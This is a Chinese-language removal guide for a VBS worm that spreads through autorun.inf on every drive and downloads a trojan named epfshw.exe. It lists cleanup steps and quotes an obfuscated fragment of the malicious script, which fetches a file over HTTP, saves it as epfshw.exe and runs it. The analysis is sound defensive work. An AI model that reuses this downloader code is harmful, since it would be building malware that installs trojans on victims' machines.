由于这个.VBS脚本恶意程序通过访问网盘和论坛附件下载木马程序,同时主程序通过循环检查自我修复不停的释放*.VBS脚本倒各盘符下面,从而到达双击任意盘符而运行恶意程序的目的。这种恶意程序自我保护的方法处理起来比较麻烦。
处理办法:(最好在断开网络的情况下进行下述操作)
1.构建安全模式:能通过开机进入安全模式的直接进入安全模式;安全模式被破坏的,使用wsyscheck构建安全环境直接操作或者在安全环境下修复安全模式然后重启倒安全模式。
2.在安全的环境下,不要随便点击桌面图标、盘符或者网页文件。
3. 使用win+e打开资源管理器,确保能显示受系统保护而隐藏的文件之后删除个盘符下面的autorun.inf配置文件以及*.vbs脚本以及其他可疑的.exe可执行文件。然后迅速做好免疫U盘病毒工作,使用U盘免疫工具或者手动建立autorun.inf的文件夹。
4.处理*.VBS利用wscript.exe传播的途径,在C:\WINDOWS\system32\找到wscript.exe的,在文件旁边新建一个文件夹,复制文字wscript.exe,然后将wscript.exe文件迅速拖进新建文件夹中,接着将文件夹重命名直接粘贴。系统会提示点击否,然后确定。这样VBS脚本就无法调用这个文件运行*.VBS的程序从而进下载木马的目的。(等处理完木马之后删除wscript.exe文件夹就可以了,系统会自动修复文件。)
5.上面所有操作的目的是破坏*.vbs发作,由于目前对于这个程序主程序发作特点还不是特别清楚,而且杀毒软件也无法扫描到。
例如这段*.vbs文件代码显示主程序是epfshw.exe,也就是说病毒位置系统目录下面的epfshw.exe文件。
select:s=CreateObject("Scripting.FileSystemObject").GetFile("epfshw.exe").size:if s="27022" or s="27031" or s="27006" then:CreateObject("WScri"+"pt.Sh"+"ell").Run "cmd /c epfshw.exe",1:WScript.Quit:end if:WScript.Sleep(30000):loop:Sub a(u):Set o=CreateObject("Micr"+"osoft.XMLH"+"TTP").Open "GET",u,0.Send:With CreateObject("AD"+"ODB.Str"+"eam"):.Mode=3:.Type=1:.Open():.Write(o.responseBody):.SaveToFile "epfshw.exe",2:End With:End Sub6.可能需要修复下文件关联。